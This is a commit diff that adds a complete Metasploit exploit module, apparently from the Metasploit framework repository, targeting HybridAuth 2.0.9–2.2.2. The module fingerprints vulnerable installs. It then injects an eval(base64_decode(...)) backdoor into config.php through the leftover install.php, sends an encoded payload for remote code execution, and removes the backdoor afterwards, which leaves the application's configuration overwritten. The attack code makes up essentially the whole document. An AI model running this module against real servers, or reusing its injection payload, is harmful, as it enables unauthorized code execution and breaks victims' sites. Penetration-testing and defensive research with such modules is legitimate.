Land #3659 - Add HybridAuth install.php PHP Code Execution

2014-08-19 17:19:01 -05:00 · 2014-08-19 17:19:01 -05:00 · c73ec66c7a
parent 0c9dafff54 564431fd41
commit c73ec66c7a
1 changed files with 138 additions and 0 deletions
--- a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb
+++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb
@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking # application config.php is overwritten
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HybridAuth install.php PHP Code Execution',
+      'Description'    => %q{
+          This module exploits a PHP code execution vulnerability in
+        HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
+        is not removed after installation allowing unauthenticated users to
+        write PHP code to the application configuration file 'config.php'.
+
+        Note: This exploit will overwrite the application configuration file
+        rendering the application unusable.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Pichaya Morimoto', # Discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'References'     =>
+        [
+          ['EDB', '34273'],
+          ['OSVDB','109838']
+        ],
+      'Arch'           => ARCH_PHP,
+      'Platform'       => 'php',
+      'Targets'        =>
+        [
+          # Tested:
+          # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
+          ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Aug 4 2014',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
+      ], self.class)
+  end
+
+
+  #
+  # Check:
+  # * install.php exists
+  # * config.php is writable
+  # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
+  #
+  def check
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
+    if !res
+      vprint_error "#{peer} - Connection failed"
+      return Exploit::CheckCode::Unknown
+    elsif res.code == 404
+      vprint_error "#{peer} - Could not find install.php"
+    elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
+      vprint_error "#{peer} - #{$1} is not writable"
+    elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
+      version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
+      vprint_status "#{peer} - Found version: #{version}"
+      if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
+        return Exploit::CheckCode::Vulnerable
+      else
+        vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable"
+      end
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  #
+  # Exploit
+  #
+  def exploit
+    # check vuln
+    if check != Exploit::CheckCode::Vulnerable
+      fail_with Exploit::Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
+    end
+
+    # write backdoor
+    print_status "#{peer} - Writing backdoor to config.php"
+    payload_param = rand(1000)
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'install.php'),
+      'data'   => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
+    )
+    if !res
+      fail_with Failure::Unknown, "#{peer} - Connection failed"
+    elsif res.body =~ /Installation completed/
+      print_good "#{peer} - Wrote backdoor successfully"
+    else
+      fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
+    end
+
+    # execute payload
+    code = Rex::Text.encode_base64(payload.encoded)
+    print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'config.php'),
+      'data'   => "#{payload_param}=#{code}"
+    }, 5)
+    if !res
+      print_warning "#{peer} - No response"
+    elsif res.code == 404
+      fail_with Failure::NotFound, "#{peer} - Could not find config.php"
+    elsif res.code == 200 || res.code == 500
+      print_good "#{peer} - Sent payload successfully"
+    end
+
+    # remove backdoor
+    print_status "#{peer} - Removing backdoor from config.php"
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'install.php'),
+      'data'   => 'OPENID_ADAPTER_STATUS='
+    )
+    if !res
+      print_error "#{peer} - Connection failed"
+    elsif res.body =~ /Installation completed/
+      print_good "#{peer} - Removed backdoor successfully"
+    else
+      print_warning "#{peer} - Could not remove payload from config.php"
+    end
+  end
+end